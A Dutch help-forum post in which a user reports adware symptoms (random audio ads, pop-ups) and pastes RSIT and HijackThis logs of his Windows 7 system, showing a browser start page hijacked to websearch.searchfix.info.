Wie wil mijn log bekijken

[Jordan99]

Ik heb sinds kort na het downloaden van muziek dat voor 6 virussen heeft gezorgt die heb ik allemaal kunnen elemineren of verwijderen.

Maar krijg nu om de paar minuten een radio spotje te horen reclame van iets en soms ook duikt er in het niets een pagina op.

Dus ik weet haast wel zeker dat er iets over het hoofd word gezien door enkel virusscnners ik heb het al gescant met avg eset malwarebytes.

Logfile of random's system information tool 1.10 (written by random/random)

Run by Jordan at 2014-11-28 19:06:21

Microsoft Windows 7 Ultimate Service Pack 1

System drive C: has 354 GB (76%) free of 465 GB

Total RAM: 5581 MB (37% free)

Logfile of Trend Micro HijackThis v2.0.4

Scan saved at 19:06:38, on 28-11-2014

Platform: Windows 7 SP1 (WinNT 6.00.3505)

MSIE: Internet Explorer v11.0 (11.00.9600.17420)

Boot mode: Normal

Running processes:

C:\Program Files (x86)\Auslogics\BoostSpeed\BoostSpeed.exe

C:\Program Files (x86)\BillP Studios\WinPatrol\WinPatrol.exe

C:\Program Files (x86)\AVG\AVG2015\avgui.exe

C:\Windows\SysWOW64\ctfmon.exe

C:\Program Files (x86)\Emsisoft Anti-Malware\a2wizard.exe

C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineScannerApp.exe

C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineCmdLineScanner.exe

C:\Program Files (x86)\Mozilla Firefox\firefox.exe

C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe

C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe

C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe

C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

C:\Program Files\trend micro\Jordan.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = Google

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = msn

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = Bing

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = Bing

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =

F2 - REG:system.ini: UserInit=userinit.exe,

O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll

O2 - BHO: Aanmeldhulp voor Microsoft-account - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

O4 - HKLM\..\Run: [AVG_UI] "C:\Program Files (x86)\AVG\AVG2015\avgui.exe" /TRAYONLY

O4 - HKLM\..\Run: [emsisoft anti-malware] "C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe" /d=60

O4 - HKCU\..\Run: [smAudio] C:\Program Files\Conexant\SmartAudio\SmAudio.exe -c

O4 - HKCU\..\Run: [WinPatrol] C:\Program Files (x86)\BillP Studios\WinPatrol\winpatrol.exe -expressboot

O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR

O4 - HKUS\S-1-5-19\..\Run: [sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')

O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')

O4 - HKUS\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\Run: [sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User '?')

O4 - HKUS\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User '?')

O4 - HKUS\S-1-5-20\..\Run: [sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')

O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')

O4 - HKUS\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\Run: [sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User '?')

O4 - HKUS\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User '?')

O4 - HKUS\S-1-5-21-4250213819-786104705-630478919-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\..\Run: [smAudio] C:\Program Files\Conexant\SmartAudio\SmAudio.exe -c (User '?')

O4 - S-1-5-21-4250213819-786104705-630478919-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 Startup: Dropbox.lnk = Jordan\AppData\Roaming\Dropbox\bin\Dropbox.exe (User '?')

O4 - Startup: Dropbox.lnk = Jordan\AppData\Roaming\Dropbox\bin\Dropbox.exe

O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200

O8 - Extra context menu item: E&xporteren naar Microsoft Excel - res://C:\PROGRA~2\MICROS~1\Office12\EXCEL.EXE/3000

O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll

O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll

O9 - Extra button: Verzenden naar OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~2\MICROS~1\Office12\ONBttnIE.dll

O9 - Extra 'Tools' menuitem: Verz&enden naar OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~2\MICROS~1\Office12\ONBttnIE.dll

O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~2\MICROS~1\Office12\REFIEBAR.DLL

O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll

O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll

O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics

O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} (OnlineScanner Control) - http://download.eset.com/special/eos/OnlineScanner.cab

O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll

O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll

O23 - Service: Emsisoft Protection Service (a2AntiMalware) - Emsisoft GmbH - C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe

O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)

O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)

O23 - Service: AtherosSvc - Qualcomm Atheros Commnucations - C:\Program Files (x86)\Bluetooth Suite\adminservice.exe

O23 - Service: AVGIDSAgent - AVG Technologies CZ, s.r.o. - C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe

O23 - Service: AVG WatchDog (avgwd) - AVG Technologies CZ, s.r.o. - C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe

O23 - Service: Cron Service for Prey (CronService) - Fork Ltd. - C:\Prey\platform\windows\cronsvc.exe

O23 - Service: @C:\Windows\system32\CxAudMsg64.exe,-100 (CxAudMsg) - Unknown owner - C:\Windows\system32\CxAudMsg64.exe (file missing)

O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)

O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)

O23 - Service: Google Update-service (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

O23 - Service: Google Update-service (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files (x86)\Google\Common\Google Updater\GoogleUpdaterService.exe

O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)

O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)

O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)

O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: Secunia PSI Agent - Secunia - C:\Program Files (x86)\Secunia\PSI\PSIA.exe

O23 - Service: Secunia Update Agent - Secunia - C:\Program Files (x86)\Secunia\PSI\sua.exe

O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)

O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)

O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)

O23 - Service: TeamViewer 8 (TeamViewer8) - TeamViewer GmbH - C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe

O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)

O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)

O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)

O23 - Service: VirtualRouterService (Virtual Router) - Chris Pietschmann (Chris Pietschmann | husband, father, hacker, entrepreneur, futurist, innovator, autodidact) - C:\Program Files (x86)\Virtual Router\VirtualRouterService.exe

O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)

O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)

O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)

O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)

O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--

End of file - 10991 bytes

======Listing Processes======

\SystemRoot\System32\smss.exe

c:\PROGRA~2\AVG\AVG2015\avgrsa.exe /boot

C:\Program Files (x86)\AVG\AVG2015\avgcsrva.exe /pipeName=c2feea3f-0200-0000-5ff8-b03f0556f331 /binaryPath="C:\Program Files (x86)\AVG\AVG2015\"

%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16

wininit.exe

%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16

winlogon.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\system32\atiesrxx.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe -k GPSvcGroup

atieclxx

C:\Windows\system32\svchost.exe -k NetworkService

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

"taskhost.exe"

"C:\Windows\system32\Dwm.exe"

"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"

C:\Windows\Explorer.EXE

"C:\Program Files (x86)\Bluetooth Suite\adminservice.exe"

"C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe"

"C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe"

"C:\Prey\platform\windows\cronsvc.exe"

C:\Windows\system32\CxAudMsg64.exe

"C:\Program Files (x86)\Secunia\PSI\PSIA.exe" --start-service

C:\Windows\system32\svchost.exe -k imgsvc

"C:\Program Files (x86)\TeamViewer\Version8\TeamViewer_Service.exe"

"C:\Program Files (x86)\AVG\AVG2015\avgnsa.exe"

"C:\Program Files (x86)\AVG\AVG2015\avgemca.exe"

taskeng.exe {445142E6-89E3-4BE6-A3D3-5EBBBF3EF845}

"C:\Program Files (x86)\Auslogics\BoostSpeed\BoostSpeed.exe" -UseTray

"C:\Program Files (x86)\Virtual Router\VirtualRouterService.exe"

"C:\Program Files (x86)\Google\Update\1.3.25.11\GoogleCrashHandler.exe"

"C:\Program Files (x86)\Google\Update\1.3.25.11\GoogleCrashHandler64.exe"

"C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE"

"C:\Program Files\Elantech\ETDCtrl.exe"

"C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe"

WLIDSvcM.exe 2484

"C:\Program Files (x86)\BillP Studios\WinPatrol\WinPatrol.exe" -expressboot

"C:\Program Files (x86)\AVG\AVG2015\avgui.exe" /TRAYONLY

ctfmon.exe

"C:\Program Files (x86)\Secunia\PSI\sua.exe" --start-service

C:\Windows\system32\SearchIndexer.exe /Embedding

C:\Windows\system32\svchost.exe -k bthsvcs

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted

"C:\Program Files\Elantech\ETDCtrlHelper.exe"

"C:\Program Files\Windows Media Player\wmpnetwk.exe"

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Windows\System32\svchost.exe -k LocalServicePeerNet

"C:\Program Files (x86)\Bluetooth Suite\BtTray.exe"

"C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe"

C:\Windows\system32\DllHost.exe /Processid:{30D49246-D217-465F-B00B-AC9DDD652EB7}

"C:\Program Files\CCleaner\CCleaner.exe" /MONITOR /uac

"C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe"

"C:\Program Files (x86)\Emsisoft Anti-Malware\a2wizard.exe"

"C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineScannerApp.exe" lng=1033

"C:\Program Files (x86)\ESET\ESET Online Scanner\OnlineCmdLineScanner.exe" "/base-dir=C:\Program Files (x86)\ESET\ESET Online Scanner" /lang=1033 /as

\??\C:\Windows\system32\conhost.exe "1475016711-348333358-10118373621225011641830753606145517866314415369511050940815

"C:\Program Files (x86)\Mozilla Firefox\firefox.exe"

"C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe" --channel=6708.18cb8ca0.1019707608 "C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll" -greomni "C:\Program Files (x86)\Mozilla Firefox\omni.ja" -appomni "C:\Program Files (x86)\Mozilla Firefox\browser\omni.ja" -appdir "C:\Program Files (x86)\Mozilla Firefox\browser" E7CF176E110C211B 6708 "\\.\pipe\gecko-crash-server-pipe.6708" plugin

"C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe" --proxy-stub-channel=Flash2344.5D79E980.9327 --host-broker-channel=Flash2344.5D79E980.9397 --host-pid=2344 --host-npapi-version=27 --plugin-path="C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll"

"C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_15_0_0_239.exe" --channel=5080.005AF524.895005784 --proxy-stub-channel=Flash2344.5D79E980.9327 --plugin-path="C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll" --host-npapi-version=27 --type=renderer

"C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe"

"C:\Program Files\Internet Explorer\iexplore.exe" http://www.pc-helpforum.be/register.php?a=act&u=51036&i=8beae8ea8b00df6511cd11d20fbb8929a20fdb14

"C:\Program Files\Internet Explorer\iexplore.exe" http://www.pc-helpforum.be/register.php?a=act&u=51036&i=8beae8ea8b00df6511cd11d20fbb8929a20fdb14

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5684 CREDAT:267521 /prefetch:2

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4516 CREDAT:267521 /prefetch:2

C:\Windows\system32\Macromed\Flash\FlashUtil64_15_0_0_239_ActiveX.exe -Embedding

"C:\Windows\system32\SearchFilterHost.exe" 0 524 528 536 65536 532

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4516 CREDAT:202040 /prefetch:2

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-4250213819-786104705-630478919-100029_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-4250213819-786104705-630478919-100029 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

C:\Windows\system32\wbem\wmiprvse.exe

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe30_ Global\UsGthrCtrlFltPipeMssGthrPipe30 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Users\Jordan\Downloads\RSITx64.exe"

======Scheduled tasks folder======

C:\Windows\tasks\Adobe Flash Player Updater.job - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

C:\Windows\tasks\GoogleUpdateTaskMachineCore.job - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c

C:\Windows\tasks\GoogleUpdateTaskMachineUA.job - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler

C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-4250213819-786104705-630478919-1000Core.job - C:\Users\Jordan\AppData\Local\Google\Update\GoogleUpdate.exe /c

C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-4250213819-786104705-630478919-1000UA.job - C:\Users\Jordan\AppData\Local\Google\Update\GoogleUpdate.exe /ua /installsource scheduler

=========Mozilla firefox=========

ProfilePath - C:\Users\Jordan\AppData\Roaming\Mozilla\Firefox\Profiles\aksqjff7.default

prefs.js - "browser.search.suggest.enabled" - false

prefs.js - "browser.search.useDBForOrder" - true

prefs.js - "browser.startup.homepage" - "http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25"

prefs.js - "keyword.URL" - "http://websearch.searchfix.info/?unqvl=63&idate=2014/11/25&l=1&q="

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]

"Description"=Adobe® Flash® Player 15.0.0.239 Plugin

"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_239.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/ShockwavePlayer]

"Description"=Adobe Shockwave Player

"Path"=C:\Windows\SysWOW64\Adobe\Director\np32dsw_1210150.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@Google.com/GoogleEarthPlugin]

"Description"=Google Earth in your browser

"Path"=C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@google.com/npPicasa3,version=3.0.0]

"Description"=Picasa3 plugin

"Path"=C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE]

"Description"=

"Path"=disabled

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]

"Description"=Ag Player Plugin

"Path"=c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3508.0205]

"Description"=WLPG Install MIME type

"Path"=C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]

"Description"=Google Update

"Path"=C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]

"Description"=Google Update

"Path"=C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.1.2]

"Description"=VLC Multimedia Plugin

"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.1.5]

"Description"=VLC Multimedia Plugin

"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]

"Description"=Handles PDFs in-place in Firefox

"Path"=C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]

"Description"=Adobe® Flash® Player 15.0.0.239 Plugin

"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_239.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/GENUINE]

"Description"=

"Path"=disabled

[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0]

"Description"=Ag Player Plugin

"Path"=c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll

C:\Users\Jordan\AppData\Roaming\Mozilla\Firefox\Profiles\aksqjff7.default\extensions\

O@bHpatKv.com

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8D10F6C4-0E01-4BD4-8601-11AC1FDF8126}]

CIESpeechBHO Class - C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-08-10 64640]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]

Windows Live ID Sign-in Helper - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17 529664]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]

Groove GFS Browser Helper - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26 2217832]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]

Aanmeldhulp voor Microsoft-account - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17 441592]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

"ETDCtrl"=C:\Program Files\Elantech\ETDCtrl.exe [2012-10-05 2873744]

"RtsCM"=C:\Windows\RTSCM64.EXE [2013-03-06 144456]

"AmIcoSinglun64"=C:\Program Files (x86)\AmIcoSingLun\AmIcoSinglun64.exe [2013-10-18 366720]

"BtPreLoad"=C:\Program Files (x86)\Bluetooth Suite\BtPreLoad.exe [2012-08-10 64640]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

"SmAudio"=C:\Program Files\Conexant\SmartAudio\SmAudio.exe [2013-10-18 2689664]

"WinPatrol"=C:\Program Files (x86)\BillP Studios\WinPatrol\winpatrol.exe [2014-03-22 527936]

"CCleaner Monitoring"=C:\Program Files\CCleaner\CCleaner64.exe [2014-10-23 6501656]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-08-21 959176]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BlueStacks Agent]

C:\Program Files (x86)\BlueStacks\HD-Agent.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google Update]

C:\Users\Jordan\AppData\Local\Google\Update\GoogleUpdate.exe [2014-03-08 116648]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google+ Auto Backup]

C:\Users\Jordan\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe [2014-08-12 3746120]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GrooveMonitor]

C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [2009-02-26 30040]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Secunia PSI Tray.lnk]

C:\PROGRA~2\Secunia\PSI\psi_tray.exe [2013-12-06 565464]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Virtual Router Manager.lnk]

C:\Windows\INSTAL~1\{BE905~1\_118D1~1.EXE [2013-12-02 22486]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^Users^Jordan^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk]

C:\Users\Jordan\AppData\Roaming\Dropbox\bin\Dropbox.exe [2014-11-13 35419192]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]

"AVG_UI"=C:\Program Files (x86)\AVG\AVG2015\avgui.exe [2014-11-09 3653136]

"emsisoft anti-malware"=C:\Program Files (x86)\Emsisoft Anti-Malware\a2guard.exe [2014-10-13 4873248]

C:\Users\Jordan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Dropbox.lnk - C:\Users\Jordan\AppData\Roaming\Dropbox\bin\Dropbox.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]

